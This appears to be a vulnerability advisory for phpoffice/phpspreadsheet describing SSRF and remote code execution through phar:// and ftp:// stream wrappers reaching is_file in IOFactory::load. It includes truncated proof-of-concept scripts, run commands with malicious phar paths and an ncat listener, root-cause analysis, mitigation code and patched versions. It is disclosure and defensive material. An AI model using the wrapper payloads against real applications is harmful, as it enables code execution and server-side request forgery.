Insecure deserialization In phpoffice/phpspreadsheet
Description
PhpSpreadsheet has SSRF/RCE in IOFactory::load when $filename is user controlled
The usage of is_file, used to verify if the $filename is indeed an actual file, by all(?) Reader implementations (inside the helper function File::assertFile) is php-wrapper aware, for any php wrappers implementing stat().
The 3 wrappers ftp://, phar:// and ssh2.sftp://, all satisfy this requirement - 2 of which are shown in the PoC below.
This results in a SSRF, at "best", and RCE at worse.
This was tested against the latest release - but the issue seems to go back a while from a first quick check (still present in v1.30.2).
PoC
To reproduce the vulnerable behavior, the following scripts were used:
php.ini file, only needed to build the malicious phar, not necessary to exploit on a deployed instance of the library:
phar.readonly=0
make_phar.php to create the malicious file:
<?php // php -c php.ini make_phar.php class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() {...
test.php showcases the unsafe pattern:
<?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; class GadgetClass { public $data; function __construct($d) {...
RCE
Run the PoC (for RCE):
php -c php.ini make_phar.php && php test.php phar://exploit.xlsx/test; ls -lah /tmp/poc.txt
The file /tmp/poc.txt should now be present on disk.
Note: the vuln still triggers if the file pointed to inside the phar does not exist/is not supported (html, xlsx, etc...). This means an attacker could "silently" trigger the vuln without leaving any error logs if the file inside the phar exists and is supported instead.
SSRF
Run the PoC (for SSRF):
ncat -lvp 21 #run on another terminal php test.php ftp://127.0.0.1:21/test
Observe a connection is made to 127.0.0.1 on port 21.
Root Cause Analysis
Following the API exposed by the library, using IOFactory::load, the code proceeds as follows:
IOFactory::load($filename) -> IReader::load($filename, $flags) -> IReader::loadSpreadsheetFromFile($filename) -> File::assertFile($filename, ...) -> is_file($filename);
The one obvious gadget that was found is guarded via __unserialize (or __wakeup in older versions) in the XMLWriter class, making it not possible to use the phar deserialization as a standalone attack vector using just this library - it is still viable to create "POP" gadget chains via other classes which may be available in real-world deployment scenarios.
public function __destruct() { // Unlink temporary files // There is nothing reasonable to do if unlink fails. if ($this->tempFileName != '') { @unlink($this->tempFileName); } }...
Phpspreadsheet is used as a backbone for many library wrappers, including very widespread ones from packagist like maatwebsite/excel for Laravel, sonata-project/exporter and so on, hence the deserialization vector stays relevant in other contexts.
Suggested mitigations
Use is_file only after making sure the filename does not contain any php wrapper:
$scheme = parse_url($filename, PHP_URL_SCHEME); // strlen check > 1 to avoid issues with Windows absolute paths (e.g. C:\...), Windows quirks :) // since no built-in or commonly registered PHP stream wrapper uses a single-character scheme, this should be ok, to my knowledge if ($scheme !== null && strlen($scheme) > 1) { throw new \PhpOffice\PhpSpreadsheet\Exception( "Stream wrappers are not permitted as file paths: {$filename}" ); }...
or perhaps even just passing it to realpath before calling is_file to ensure it is parsed correctly:
$real = realpath($filename); // not php wrapper aware AFAIK if ($real === false) { throw new \PhpOffice\PhpSpreadsheet\Exception("Invalid file path: {$filename}"); } // from here on, $real should be a clean absolute path so we can pass it to is_file() if (!is_file($real)) { throw new ......
Note:
stream_is_local()would also not be safe here — as it considersphar://to be local and would not block it.
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
packagist | 5.6.0, 3.10.4, 2.4.4, 2.1.15, 1.30.3 |
Aliases
References